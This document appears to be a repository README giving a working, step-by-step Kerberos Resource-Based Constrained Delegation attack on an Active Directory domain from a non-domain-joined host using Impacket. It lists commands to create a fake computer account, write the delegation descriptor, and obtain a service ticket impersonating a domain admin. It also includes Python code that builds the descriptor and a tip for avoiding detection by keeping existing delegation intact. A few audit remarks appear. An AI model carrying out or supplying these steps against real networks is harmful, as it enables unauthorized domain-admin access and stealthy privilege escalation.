Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket
This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation (RBCD) in a Windows Active Directory domain.
The difference from other common implementations is that the attack is launched from outside of the Windows domain, i.e. from a host that is not domain joined (and not necessarily Windows), rather than from a domain-joined (usually Windows) computer.
The attack is implemented using only Python3 Impacket (and its dependencies). Tested on Arch Linux with up-to-date Impacket (0.9.21 as of writing).
In summary, without going into deep details: the attack targets a domain computer account, more precisely the services (SPNs such as cifs/) registered to that computer account, and ends with a valid service ticket for one of those services issued in the name of a domain user of our choice (for example a domain admin).
What we need here as prerequisites:
- a domain user account that has write access to the target computer's domain object, specifically to the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer domain object (typically because of GenericWrite, GenericAll or WriteDacl over the object, or because that user created the computer object)
- the right to create a new computer account in the domain (by default every authenticated user may create up to 10 computer accounts; this is governed by the `ms-DS-MachineAccountQuota` attribute of the domain object)
The attack path at a very high level:
1. create a fake computer account in the domain with a password we know (this gives us a principal with an SPN and a long-term key, which the S4U requests require)
2. write a security descriptor that allows the fake computer to act on behalf of other identities into the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer
3. authenticate as the fake computer and request a service ticket for the target computer's service via S4U2Self followed by S4U2Proxy, impersonating a privileged domain user
Benefit:
The common toolsets for this attack operate on a domain-joined Windows computer using PowerShell and .NET tooling (typically Powermad, PowerView and Rubeus) for:
- creating the fake computer account
- abusing `msDS-AllowedToActOnBehalfOfOtherIdentity` (writing the security descriptor over LDAP)
- the S4U2Self/S4U2Proxy ticket requests
This implementation uses pure Impacket from outside the domain, so neither a domain-joined Windows machine nor any PowerShell tooling on the target network is needed; network access to the DC and one set of domain credentials is enough.
Using the addcomputer.py example from Impacket, let's create a fake computer account (called evilcomputer):
```
addcomputer.py -computer-name 'evilcomputer$' -computer-pass '<EvilComputerPassword>' -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0
```
test:ohW9Lie0 is the ordinary domain user we already hold. The computer password is shown as a placeholder; pick any value and use the same one later in the getST.py step. Account names are case-insensitive in AD, which is why the account is referred to as EVILCOMPUTER$ below.
The script rbcd.py found in this repo writes a security descriptor that grants the newly created EVILCOMPUTER$ account the right to act on behalf of other identities into the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer (here WEB):
```
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
```
The script makes heavy use of the Python classes in the ntlmrelayx.py Impacket example. For help and an example, call the script without options.
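To make concrete what gets stored in the attribute, here is an added example (not the repo's own rbcd.py, and independent of Impacket) that builds the self-relative security descriptor written into msDS-AllowedToActOnBehalfOfOtherIdentity and parses one back, which is also how a defender would audit which SIDs may delegate to a host. The SID used for EVILCOMPUTER$ is a constructed value; on a real domain it is the objectSid of the computer object created by addcomputer.py. The layout (owner and group BUILTIN\Administrators, no SACL, a DACL with one ACCESS_ALLOWED_ACE per SID carrying mask 0x000F01FF) follows what the common RBCD tooling writes.

```python
import struct

# Layout constants from the Windows security descriptor format (MS-DTYP).
SD_REVISION = 1
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4            # ACL revision used for directory objects
ACCESS_ALLOWED_ACE_TYPE = 0x00
# Access mask the common RBCD tooling grants to the delegating account
# (SDDL CCDCLCSWRPWPDTLOCRSDRCWDWO, i.e. 0x000F01FF).
RBCD_ACCESS_MASK = 0x000F01FF
# Owner/group the tooling puts in the descriptor: BUILTIN\Administrators.
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"

# Constructed SID for the fake EVILCOMPUTER$ account; a real one comes from
# the objectSid attribute of the computer object created by addcomputer.py.
EVILCOMPUTER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1601"


def sid_to_bytes(sid):
    """Encode an S-1-... string into the binary SID layout used inside ACEs."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("malformed SID: %s" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities in %s" % sid)
    return (struct.pack("<BB", 1, len(subs))
            + authority.to_bytes(6, "big")             # identifier authority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, offset=0):
    """Decode a binary SID at buf[offset:]; returns (sid_string, bytes_consumed)."""
    rev, count = struct.unpack_from("<BB", buf, offset)
    if rev != 1:
        raise ValueError("unsupported SID revision %d" % rev)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<" + "I" * count, buf, offset + 8)
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids):
    """Self-relative SD whose DACL has one ACCESS_ALLOWED_ACE per SID (what rbcd-style tools write)."""
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        ace_size = 8 + len(sid_bytes)                    # type, flags, size, mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, RBCD_ACCESS_MASK) + sid_bytes
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    offset_owner = 20                                    # the SD header is 20 bytes
    offset_group = offset_owner + len(owner)
    offset_dacl = offset_group + len(owner)
    header = struct.pack("<BBHIIII", SD_REVISION, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         offset_owner, offset_group, 0, offset_dacl)  # SACL offset 0: none
    return header + owner + owner + acl


def parse_rbcd_descriptor(sd):
    """Return [(sid, mask), ...] for every allow ACE in the DACL; [] if the attribute is empty/absent."""
    if not sd:
        return []
    rev, _, control, _, _, _, offset_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != SD_REVISION or not control & SE_DACL_PRESENT or offset_dacl == 0:
        return []
    _, _, acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, offset_dacl)
    pos, end, entries = offset_dacl + 8, offset_dacl + acl_size, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_size < 8 or pos + ace_size > end:
            raise ValueError("ACE runs past the end of the ACL")
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            entries.append((bytes_to_sid(sd, pos + 8)[0], mask))
        pos += ace_size
    return entries


def is_allowed_to_delegate(sd, sid):
    """Audit helper: does this descriptor let `sid` act on behalf of other identities?"""
    return any(s == sid for s, _ in parse_rbcd_descriptor(sd))


if __name__ == "__main__":
    sd = build_rbcd_descriptor([EVILCOMPUTER_SID])
    print("msDS-AllowedToActOnBehalfOfOtherIdentity value (%d bytes): %s" % (len(sd), sd.hex()))
    for sid, mask in parse_rbcd_descriptor(sd):
        print("allowed to delegate: %s (mask 0x%08X)" % (sid, mask))
```

Whatever client writes the value (rbcd.py, or a plain LDAP client such as ldap3 with `conn.modify(dn, {'msDS-AllowedToActOnBehalfOfOtherIdentity': [(MODIFY_REPLACE, [sd])]})`) replaces the attribute as a whole, so if legitimate delegation is already configured on the target, parse the current value first and pass the existing SIDs plus your own to build_rbcd_descriptor; otherwise you break that delegation and draw attention. The same parser run over the attribute of every computer object is a cheap periodic check for delegation grants nobody configured on purpose.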
Now everything is ready for abusing the delegation. Authenticating as EVILCOMPUTER$, we send an S4U2Self request to obtain a ticket to ourselves on behalf of the target user, then an S4U2Proxy request that exchanges it for a service ticket to the target computer's service; the KDC permits the second step because our SID is now in the target's msDS-AllowedToActOnBehalfOfOtherIdentity. The getST.py Impacket example performs both requests:
```
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 'ecorp.local/EVILCOMPUTER$:<EvilComputerPassword>'
```
The above command fetches a CIFS service ticket for WEB.ecorp.local on behalf of the targeted domain user admin and stores it in the file admin.ccache (getST.py names the cache after the impersonated user). This does not work for users that cannot be delegated: members of the Protected Users group and accounts marked "Account is sensitive and cannot be delegated" receive a non-forwardable ticket from S4U2Self, and the S4U2Proxy step is then refused by the KDC.
After pointing the KRB5CCNAME variable at the file, the ticket is usable by Kerberos-aware clients, including the Impacket examples when invoked with -k -no-pass:
```
export KRB5CCNAME=`pwd`/admin.ccache
klist
```
For details about abusing Resource-Based Constrained Delegation:
And one of the most comprehensive presentations about Kerberos Attacks: